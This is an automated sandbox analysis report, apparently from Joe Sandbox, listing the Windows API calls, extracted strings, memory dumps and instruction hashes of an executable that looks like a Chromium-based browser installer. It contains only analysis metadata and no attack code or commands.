                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 059A03D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WinHTTP$ Windows_NT/%lu.%lu.%lu.%lu ($%08x$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$/$/%lu.%lu.%lu.%lu$0$0$0$0$0$0$0$0.8.0$; WoW64$<$Content-Length$Cras$HTTP$HTTP status $IsWow64Process$Transfer-Encoding: chunked$WinHttpAddRequestHeaders$WinHttpConnect$WinHttpCrackUrl$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryHeaders$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetTimeouts$WinHttpWriteData$hpad$http_transport_win.cc$kernel32.dll$oW64$winhttp.dll$x86
                                                                                                                        • API String ID: 0-1811334646
                                                                                                                        • Opcode ID: f5724a93d48c58b195cced18e4b4e8a637a6ad6214c6ead0cce3242fa727523c
                                                                                                                        • Instruction ID: 1556e7237624c1f4cd105afd648f08d59812ff5ae978ae579e1b66ca2096e298
                                                                                                                        • Opcode Fuzzy Hash: f5724a93d48c58b195cced18e4b4e8a637a6ad6214c6ead0cce3242fa727523c
                                                                                                                        • Instruction Fuzzy Hash: 01E2C271A006289ADF708B64CC55BEAB775FF51308F05C1E8E589E7282DB709ECA8F51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0089C6C0: OpenProcess.KERNEL32(00100451,00000000,?,008B8551,?,?), ref: 0089C6D4
                                                                                                                          • Part of subcall function 0089C6C0: GetLastError.KERNEL32 ref: 0089C6E2
                                                                                                                          • Part of subcall function 0089C6C0: SetLastError.KERNEL32(00000000), ref: 0089C6F7
                                                                                                                          • Part of subcall function 0089C6C0: GetCurrentProcess.KERNEL32 ref: 0089C701
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0092ED0F
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0092EFFA
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0092F8E7
                                                                                                                        • GetProcAddress.KERNEL32(?,NtWow64QueryInformationProcess64), ref: 0092F905
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandleLastModuleProcess$AddressCurrentInit_thread_headerOpenProc
                                                                                                                        • String ID: Failed $ GDI Handle Table Failed $ Missing$ PEB Failed $..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$NtQueryInformationProcess$NtReadVirtualMemory$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$gdi_debug_util_win.cc$ntdll.dll
                                                                                                                        • API String ID: 3776924181-20178590
                                                                                                                        • Opcode ID: b026aa1d994d4ee7849fcdf91fd3d5085894aac93f78137347de4523e77f31c6
                                                                                                                        • Instruction ID: 15339b54d8c8d1b63473d1517028febbd629fbe1e7f63176f134c9dfc6eefe64
                                                                                                                        • Opcode Fuzzy Hash: b026aa1d994d4ee7849fcdf91fd3d5085894aac93f78137347de4523e77f31c6
                                                                                                                        • Instruction Fuzzy Hash: E362D371604301ABD710DF28D8A6B2BB7E5FFC4704F04893DF9899B292E775D9058B92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008753C0: VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        • DeleteFileW.KERNEL32(?,Executable path: ,009432B5,00000000,InstallBrowser,000004AF,?,?), ref: 00844C46
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,000004A0), ref: 00844D38
                                                                                                                        • GetLastError.KERNEL32(?,?,000004A0), ref: 00844D43
                                                                                                                        • GetLastError.KERNEL32 ref: 00844DFB
                                                                                                                        • GetLastError.KERNEL32(?,00040221,?,?,?,?,000004A0), ref: 00844EC5
                                                                                                                        • GetLastError.KERNEL32(?,?,00040221,?,?,?,?,000004A0), ref: 00844F3B
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00845107
                                                                                                                        • GetLastError.KERNEL32 ref: 008452B0
                                                                                                                        Strings
                                                                                                                        • Verification succeeded: , xrefs: 00845021
                                                                                                                        • Installation after download event isn't in signal state or installation was stopped early., xrefs: 00844D7E
                                                                                                                        • Executable path: , xrefs: 00844C1A
                                                                                                                        • Cannot lock file: , xrefs: 00844E36, 00844F07
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00845519
                                                                                                                        • Install Browser., xrefs: 00844AD5
                                                                                                                        • Module verification failed: , xrefs: 00844F76
                                                                                                                        • InstallBrowser, xrefs: 00844ABD, 00844BFB, 00844D66, 00844E1E, 00844EE8, 00844F5E, 00845009, 008452CF
                                                                                                                        • Unexpected error in CreateDelayedParamsMapping(), xrefs: 008452E7
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00845527
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00845520
                                                                                                                        • , xrefs: 00844B60
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AllocDeleteFileMultipleObjectsUnothrow_t@std@@@VirtualWait__ehfuncinfo$??2@
                                                                                                                        • String ID: $..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Cannot lock file: $Executable path: $Install Browser.$InstallBrowser$Installation after download event isn't in signal state or installation was stopped early.$Module verification failed: $Unexpected error in CreateDelayedParamsMapping()$Verification succeeded:
                                                                                                                        • API String ID: 2851896732-2479545896
                                                                                                                        • Opcode ID: ae9d02663c8a920399089f496f8d652dd59e5941a054c6c5386c84f46f4327b9
                                                                                                                        • Instruction ID: 9335e57b85ab0181248da23892cbcce53cbe5c41b94c508c0e7934ab9e19291b
                                                                                                                        • Opcode Fuzzy Hash: ae9d02663c8a920399089f496f8d652dd59e5941a054c6c5386c84f46f4327b9
                                                                                                                        • Instruction Fuzzy Hash: F2528D716087859BD714EF24C841BAEB7E1FFC5704F04892DF58997282EBB0A949CB93
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000021,?), ref: 0083C28E
                                                                                                                        • GetLastError.KERNEL32(?,00000021,?), ref: 0083C2D7
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000021,?), ref: 0083C312
                                                                                                                        • GetLastError.KERNEL32(?,00000021,?), ref: 0083C34D
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0083C3DB
                                                                                                                          • Part of subcall function 0089D890: GetFileSizeEx.KERNEL32(00000000,?,?,00000000), ref: 0089D91E
                                                                                                                        • GetLastError.KERNEL32(00941354,..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at), ref: 0083C911
                                                                                                                        Strings
                                                                                                                        • Invalid ASN1 format of certificate table in , xrefs: 0083C56D, 0083C87B
                                                                                                                        • ExtractTagFromFakeCertificate, xrefs: 0083C2A8, 0083C3F5, 0083C554, 0083C862
                                                                                                                        • ReadAllBytesFromFile, xrefs: 0083C2F2, 0083C32D, 0083C368
                                                                                                                        • Failed to read file , xrefs: 0083C40E
                                                                                                                        • Failed to read all bytes of , xrefs: 0083C346
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 0083C8FB
                                                                                                                        • Can't open file , xrefs: 0083C381
                                                                                                                        • Failed to find certificate table in , xrefs: 0083C2C1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0083CB05
                                                                                                                        • Failed to get length of , xrefs: 0083C30B
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 0083C902
                                                                                                                        • ..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 0083CAFB
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileSize
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds$Can't open file $ExtractTagFromFakeCertificate$Failed to find certificate table in $Failed to get length of $Failed to read all bytes of $Failed to read file $Invalid ASN1 format of certificate table in $ReadAllBytesFromFile
                                                                                                                        • API String ID: 3064237074-3678735519
                                                                                                                        • Opcode ID: 118b7b246ecd9ec8b23b9145d764a0295ab01dfd36457fd6b44060f3ac060668
                                                                                                                        • Instruction ID: 73199f6bc3709eb53366578b834b66cf68936760744a3a91efad1bd775e5d03a
                                                                                                                        • Opcode Fuzzy Hash: 118b7b246ecd9ec8b23b9145d764a0295ab01dfd36457fd6b44060f3ac060668
                                                                                                                        • Instruction Fuzzy Hash: 2F4294716083519FCB14DF24D891A6EB7A1FFD4748F44891CF986E7241EB70AA4ACBC2
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E8DE1,?,?,009423BD,?), ref: 008E8E9B
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,008E8DE1,?), ref: 008E9314
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E8DE1,?,?,009423BD,?), ref: 008E8ED0
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID: first
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 0086C552
                                                                                                                        • GetModuleHandleW.KERNEL32(winhttp.dll), ref: 0086C579
                                                                                                                        • FormatMessageA.KERNEL32(00001AFF,00000000,00000000,00000000,?,00000100,00000000), ref: 0086C58C
                                                                                                                        • _strlen.LIBCMT ref: 0086C5CB
                                                                                                                        • _strlen.LIBCMT ref: 0086C77A
                                                                                                                        • GetLastError.KERNEL32 ref: 0086C8EF
                                                                                                                        • _strlen.LIBCMT ref: 0086C91E
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0086CAC9
                                                                                                                        • winhttp.dll, xrefs: 0086C574
                                                                                                                        • (0x%lx), xrefs: 0086C5BA
                                                                                                                        • : error 0x%lx while retrieving error 0x%lx, xrefs: 0086C8F7
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0086CA31
                                                                                                                        • ..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 0086CAD0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$ErrorLast$FormatHandleMessageModule
                                                                                                                        • String ID: (0x%lx)$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:970: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr$: error 0x%lx while retrieving error 0x%lx$winhttp.dll
                                                                                                                        Strings
                                                                                                                        • SampleVector-max, xrefs: 008AB452
                                                                                                                        • SampleVector-range_max, xrefs: 008AB4D2
                                                                                                                        • SampleVector-min, xrefs: 008AB412
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008AB3EC
                                                                                                                        • SampleVector-range_min, xrefs: 008AB492
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008AACC8, 008AAEC7, 008AB176
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008AB3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$SampleVector-max$SampleVector-min$SampleVector-range_max$SampleVector-range_min
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetDiskFreeSpaceEx failed, xrefs: 008BAE49
                                                                                                                        • HasEnoughDiskSpace, xrefs: 008BADFF, 008BAE34, 008BAE5B
                                                                                                                        • There is not enough disk space to install browser, xrefs: 008BAE14
                                                                                                                        • .0.0, xrefs: 008BA7D2
                                                                                                                        • SHGetFolderPath failed, xrefs: 008BAE70
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BAD4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen$DiskFreeSpace
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$.0.0$GetDiskFreeSpaceEx failed$HasEnoughDiskSpace$SHGetFolderPath failed$There is not enough disk space to install browser
                                                                                                                        APIs
                                                                                                                        • SetHandleInformation.KERNEL32(?,00000001,00000001,?,009659FC), ref: 0089D03E
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?), ref: 0089D2F7
                                                                                                                        • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0089D384
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,?,?,?,009659FC), ref: 0089D3F2
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0089D49F
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,009659FC), ref: 0089D4DA
                                                                                                                        Strings
                                                                                                                        • launch_win.cc, xrefs: 0089CF4C, 0089D3CF, 0089D507
                                                                                                                        • LaunchProcess, xrefs: 0089CF51, 0089D3D4, 0089D50C, 0089D572
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089D4EC
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 0089D4E5
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089D4F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentObjectProcessStrings$AssignCreateFreeHandleInformationSingleWait
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$LaunchProcess$launch_win.cc
                                                                                                                        Strings
                                                                                                                        • launched, xrefs: 008E04E8, 008E050C
                                                                                                                        • launched, xrefs: 008E0738, 008E073D
                                                                                                                        • old_ver, xrefs: 008E07CE, 008E0833, 008E083A, 008E084B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008E0317
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008E031E
                                                                                                                        • ui, xrefs: 008E0763
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$launched$launched$old_ver$ui
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CB990
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CB9D2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: 0$1$?$@
                                                                                                                        • API String ID: 3738618077-2988480200
                                                                                                                        • Opcode ID: 5057cac69bc56d87585c705778b3ecee2aaf894f127344f9bb46fe74025c0c68
                                                                                                                        • Instruction ID: 5ea54e26629c7a8cd62ad31b9a5b92cf28b13347a51c2123f159c600048791b8
                                                                                                                        • Opcode Fuzzy Hash: 5057cac69bc56d87585c705778b3ecee2aaf894f127344f9bb46fe74025c0c68
                                                                                                                        • Instruction Fuzzy Hash: 90F2C1716086998FC728CE24C491B6EB7F2FB95358F28891DE4A6DB250D335EC45CB43
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,00000000,?,?,008F5E87,?,00000000,?,?,00000000,?,?,-00000100,-000000FF,?), ref: 008F4981
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,00000002,?,?,008E6A46,00000002,?,?,?), ref: 008F4A30
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,008F5E87,?,00000000,?,?,00000000,?,?,-00000100,-000000FF,?,?,008F56C4,?), ref: 008F4A00
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,008E6A46,00000002,?,?,?), ref: 008F4AAF
                                                                                                                        Strings
                                                                                                                        • bitset set argument out of range, xrefs: 008F4A0D
                                                                                                                        • bitset reset argument out of range, xrefs: 008F4ABB
                                                                                                                        • t1=, xrefs: 008F4A4A
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: bitset reset argument out of range$bitset set argument out of range$t1=
                                                                                                                        • API String ID: 1678258262-157012313
                                                                                                                        • Opcode ID: 570f638a0199ced85597afa9c4dcdbdcb7b1dee70681ea34812216cfd7cd2a6c
                                                                                                                        • Instruction ID: d0f36e0c6f2a0cc3e039f2a553193ab9e5847d2da39ae14d33eafa1a0be19f7a
                                                                                                                        • Opcode Fuzzy Hash: 570f638a0199ced85597afa9c4dcdbdcb7b1dee70681ea34812216cfd7cd2a6c
                                                                                                                        • Instruction Fuzzy Hash: F2314B3335462C8BCB1C5E78AC4667F3716FBD23A5B14821AFA12C31A2D6B08C42C694
                                                                                                                        Strings
                                                                                                                        • base, xrefs: 008CE62E
                                                                                                                        • yatestscreen, xrefs: 008CE707
                                                                                                                        • chrome, xrefs: 008CE6E1
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008CE516
                                                                                                                        • test, xrefs: 008CE650, 008CE6F4
                                                                                                                        • gen, xrefs: 008CE5F2
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008CE51D
                                                                                                                        • CR_SOURCE_ROOT, xrefs: 008CE3D3
                                                                                                                        • data, xrefs: 008CE672
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CR_SOURCE_ROOT$base$chrome$data$gen$test$yatestscreen
                                                                                                                        • API String ID: 0-1251466949
                                                                                                                        • Opcode ID: a1a41e2daa516ebea264ccec2cd62b478263e161db8a339c432cbf35318c3810
                                                                                                                        • Instruction ID: 8ca88fee3fe284b60874e3bda4f761b779620947188bc351a692ef0b4c1caa75
                                                                                                                        • Opcode Fuzzy Hash: a1a41e2daa516ebea264ccec2cd62b478263e161db8a339c432cbf35318c3810
                                                                                                                        • Instruction Fuzzy Hash: 2DA19670A002095BDF14AF699852FFF7B36FF85708F04442DF905E7382EA74AA05C6A2
                                                                                                                        APIs
                                                                                                                        • __floor_pentium4.LIBCMT ref: 008D8CA2
                                                                                                                        • __floor_pentium4.LIBCMT ref: 008D8DED
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008D8ED8
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008D8FF8
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008D904D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008D8E88
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Release__floor_pentium4$Acquire
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                                                                                        • API String ID: 2821508176-2888085009
                                                                                                                        • Opcode ID: 76c9b06a5447f2bda869bb63940f6de34cc8e03a39ec34cd228fc50ac13a95d3
                                                                                                                        • Instruction ID: 6e722b82ce9b3ef9ee300895470b8466203c4d3bc81b6d38ef060dc94d95d2f5
                                                                                                                        • Opcode Fuzzy Hash: 76c9b06a5447f2bda869bb63940f6de34cc8e03a39ec34cd228fc50ac13a95d3
                                                                                                                        • Instruction Fuzzy Hash: F412B371B1461ACFCB18CF69D88156EB7F2FF99310718862AE506EB351EB30ED418B91
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E6E39
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E70AC
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockRelease
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1766480654-2456940119
                                                                                                                        • Opcode ID: d730557c8644eeee16109a55f7616b03987a0788caa812098893bfe0c047b73d
                                                                                                                        • Instruction ID: 99f3ec014a5f69597452af6f5bfc69589a2bc901ed111b12dd62f3b77b561731
                                                                                                                        • Opcode Fuzzy Hash: d730557c8644eeee16109a55f7616b03987a0788caa812098893bfe0c047b73d
                                                                                                                        • Instruction Fuzzy Hash: 4AE1E1716087418FC718CF29C88476AB7E2FFD6358F19856CE8898B292E731EC55CB81
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: e633729ee0fca064e5c5b065c6d2daf4328d148a6d29e45279eb25e597e660fe
                                                                                                                        • Instruction ID: d0f9cee6d523a1ae73b0ec601a7e39b1f0441f6eacd4be5285ba19a21ffbe6ec
                                                                                                                        • Opcode Fuzzy Hash: e633729ee0fca064e5c5b065c6d2daf4328d148a6d29e45279eb25e597e660fe
                                                                                                                        • Instruction Fuzzy Hash: BED24B72E086298FDB65CE28ED407EAB7F9EB44304F1445EAD44DE7244E778AE818F41
                                                                                                                        Strings
